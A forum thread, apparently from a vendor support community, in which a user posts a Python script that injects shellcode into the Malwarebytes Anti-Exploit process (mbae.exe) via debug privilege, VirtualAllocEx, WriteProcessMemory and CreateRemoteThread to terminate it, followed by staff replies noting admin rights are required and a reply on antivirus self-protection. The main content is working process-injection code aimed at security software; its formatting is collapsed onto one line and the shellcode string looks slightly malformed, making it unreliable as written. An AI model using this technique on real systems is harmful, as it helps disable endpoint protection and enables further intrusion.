Jump to content

Injecting code into Malwarebytes Anti-Exploit


RasAlGhul

Recommended Posts

Malwarebytes Anti-Exploit version: 0.09.4.2000

perhaps in final version will not be possible to do this, but until then you can make mbae do what you want:))

this script only make him exit, nothing dangerous

#python 2.7.5#ViRii.tkimport sysfrom ctypes import *import win32securityimport win32apiimport psutil #http://code.google.com/p/psutil/import timekernel32 = windll.kernel32processname = "mbae.exe"    shellcode = "\xb4\x4c\b0\x00\xcd\x21"def getpid(pname):    for proc in psutil.process_iter():       if proc.name == pname:           return proc.pid     temp99 = getpid(processname)if temp99!= None:    pid = temp99    print "Malwarebytes Anti-Exploit process located: %i"% pidelse:    print "Nu am gasit procesul: %s" %processname    sys.exit()print "\tHoold..."time.sleep(0.5)print "\tHoooold..."time.sleep(1)print "\tHoooooooooold..."PAGE_EXECUTE_READWRITE = 0x00000040PROCESS_ALL_ACCESS = 0x1F0FFFVIRTUAL_MEM = 0x3000 #set privpriv_flags = win32security.TOKEN_ADJUST_PRIVILEGES | win32security.TOKEN_QUERYhToken = win32security.OpenProcessToken(win32api.GetCurrentProcess(), priv_flags)# enable "debug process"privilege_id = win32security.LookupPrivilegeValue (None,win32security.SE_DEBUG_NAME)old_privs = win32security.AdjustTokenPrivileges (hToken, 0,[(privilege_id, win32security.SE_PRIVILEGE_ENABLED)])proces = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)if not proces:    print "[*] Couldn't acquire a handle to PID: %s" % pid    sys.exit(0)#code_size = len(shellcode)    #Allocate some space for the shellcodearg_address = kernel32.VirtualAllocEx(proces, 0, code_size,VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)# Write out the shellcodewritten = c_int(0)kernel32.WriteProcessMemory(proces, arg_address, shellcode,code_size, byref(written))# Now we create the remote thread and point its entry routine to be head of our shellcodethread_id = c_ulong(0)if not kernel32.CreateRemoteThread(proces,None,0,arg_address,None,0,byref(thread_id)):    print "[*] Failed to inject process. Exiting."    sys.exit(0)else:    print "Malwarebytes Anti-Exploit process was killed"# clean upwin32api.CloseHandle(hToken)

Script source: Shellcode injection

Link to post
Share on other sites

  • Staff

Hi RasAlGhul, welcome to the forum.

 

Regarding your post:

 

1- You need admin access on the machine to run this.

2- To kill mbae.exe you don't have to get so fancy, simply run TaskManager as admin, right-click on mbae.exe and kill it.

 

The moral of the story is that if you have admin access on a machine, you can do whatever you want.

Link to post
Share on other sites

Anyway, not all process can be injected, even if you are Administrator. Some of them (like firewall, av-s processes) have special permission and process memory can be only read(best case), but you can't inject code into them. 

 

If that be possible all malware can be equipped with user privilege escalad, take admins rights and then kill AV process, or even worse transform av process into evil process. But this is not possible

12_21_2013_8_36_46_AM.png

Link to post
Share on other sites

  • Staff

You are referring to auto-shields which some AVs incorporate as they need to run in infected systems. But you can still kill them even with the shield (google metasploit killav).

In the case of MBAE we might incorporate this in the future, but it is really not necessary as MBAE is designed to stop attacks before they succeed, it is not designed to disinfect or live in an infected environment like AV.

Link to post
Share on other sites

  • 2 years later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.